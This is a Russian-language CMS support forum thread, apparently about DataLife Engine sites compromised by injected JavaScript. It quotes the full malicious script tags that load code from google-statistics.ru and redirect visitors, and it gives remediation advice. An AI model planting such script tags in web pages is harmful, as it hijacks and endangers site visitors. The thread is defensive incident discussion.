Перейти к публикации

C 6 сентября все страницы оказались с java-скриптом


Рекомендованные сообщения

Сегоня обнаружил в нвоостях вот такую шляпу она теперь делает редирект на порно сайт <script type="text/javascript" async="async" src="http://google-statistics.ru/js/ada67ce42f7e51433fdc45e523f90ff7.js"></script>

и она не во всех новостях!

Изменено пользователем qpool
Ссылка на сообщение
Поделиться на других сайтах

qpool,

Либо вы вычиститили первоначально не все новости, либо не поставили патч, либо после установки патча не сменили пароль к БД. Удалять JS скрипты из БД нужно перестроением новостей в админпанели скрипта.

Ссылка на сообщение
Поделиться на других сайтах

qpool,

Либо вы вычиститили первоначально не все новости, либо не поставили патч, либо после установки патча не сменили пароль к БД. Удалять JS скрипты из БД нужно перестроением новостей в админпанели скрипта.

заплатку поставил! новости все вычистил потому что скрипт то новый какой то ! пароли поменял вообще все на доступ VPS к базе , в админке все сменил везде разные! достали эти скрипты ))

Ссылка на сообщение
Поделиться на других сайтах

Произошла подобная проблема. Во все статьи вставили подобные вставки: <script async="async" type="text/javascript" src="http://google-statistics.ru/js/d072677d210ac4c03ba046120f0802ec.js"></script>

На одном и том же сервере, почему-то затронуло не все сайты, а некоторые. Может просто до них еще не добрались)

Везде поставил заплатку, почистил новости, поменял пароли. Надеюсь поможет.

Кстати, после перестроения новостей javascript удаляется из новостей, но он остается в статических страницах. Будьте внимательны и делайте перестроение стат. страниц тоже.

Изменено пользователем Aлександp
Ссылка на сообщение
Поделиться на других сайтах

Celsoft, я уже в 4 раз меняю все пароли, phpmyadmin в открытом доступе, ссылка на вход не стандарт, переделана! Также мой системный администратор сказал, что подборов паролей не было к phpmyadmin, сказал что 100% уязвимость в самом движке DLE.

Изменено пользователем chelnovosti_ru
Ссылка на сообщение
Поделиться на других сайтах

Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код(((

Ссылка на сообщение
Поделиться на других сайтах

Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код(((

После того как поставили заплатки вы пароли к БД меняли? Их менять нужно обязательно.

Ссылка на сообщение
Поделиться на других сайтах

Кстати все заплатки были поставлены уже давно, с момента их выхода. Но все равно каждый день в обед во всех новостях появляется вредоносный JS код(((

После того как поставили заплатки вы пароли к БД меняли? Их менять нужно обязательно.

Конечно менял, все 4 раза, не помогает, сайт проверили на шеллы, их там нет. Остается только одно, где-то уязвимость в DLE((((

Ссылка на сообщение
Поделиться на других сайтах

Конечно менял, все 4 раза, не помогает, сайт проверили на шеллы, их там нет. Остается только одно, где-то уязвимость в DLE((((

Добавить JS код в новости через DLE невозможно, только напрямую в БД или минуя DLE через другие скрипты. Соответственно злоумышленник либо имеет прямой доступ к вашему аккаунту, а это не только пароли к БД, а например к хостингу, либо на вашем сервере есть шелл. Других вариантов нет. Шелл может быть не в отдельных файлах, а например встроен во внутренние файлы DLE. Поэтому полностью восстановите оригинальные файлы скрипта на сервере, убедитесь что патч действительно стоит, и смените все пароли, от БД, хостинга, админпанели DLE, FTP и т.д. Если на сервере несколько сайтов, то соответственно проделать все для всех сайтов.

Ссылка на сообщение
Поделиться на других сайтах

Что касается файлов, буквально вчера вечером перезалил архив версии 9.7 чистую, установил заплатку, и один фиг ломанули( Паролик к хостинг панели сменил, фтп пароль сменил, к базе сменил, везде 20-ти значный, однако, сегодня злоумышленник пытался пробраться в БД, спаслись тем, что сис админ сделал вход в БД только по моему ип адресу.

Ссылка на сообщение
Поделиться на других сайтах

chelnovosti_ru,

Предоставьте доступ по FTP и к админпанели скрипта, осмотрим визуально ваш сервер на предмет всего постороннего. Просто обновление не всегда решает проблему, потому как это может быть в незатрагиваемых файлах, например в файлах настроек или например шелл в картинках. Для 9.7 два патча, вы их оба установили?

Также проведите обновление серверного ПО, в первую очередь phpMyAdmin, на него много исправлений уязвимостей вышло.

Ссылка на сообщение
Поделиться на других сайтах

chelnovosti_ru,

Предоставьте доступ по FTP и к админпанели скрипта, осмотрим визуально ваш сервер на предмет всего постороннего. Просто обновление не всегда решает проблему, потому как это может быть в незатрагиваемых файлах, например в файлах настроек или например шелл в картинках. Для 9.7 два патча, вы их оба установили?

Также проведите обновление серверного ПО, в первую очередь phpMyAdmin, на него много исправлений уязвимостей вышло.

Отправил вам сообщения со всем данными для входа, которые вы просили.

Ссылка на сообщение
Поделиться на других сайтах

Присоединяйтесь к обсуждению

Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.

Гость
Ответить в тему...

×   Вставлено в виде отформатированного текста.   Вставить в виде обычного текста

  Разрешено не более 75 эмодзи.

×   Ваша ссылка была автоматически встроена.   Отобразить как ссылку

×   Ваш предыдущий контент был восстановлен.   Очистить редактор

×   Вы не можете вставить изображения напрямую. Загрузите или вставьте изображения по ссылке.

×
×
  • Создать...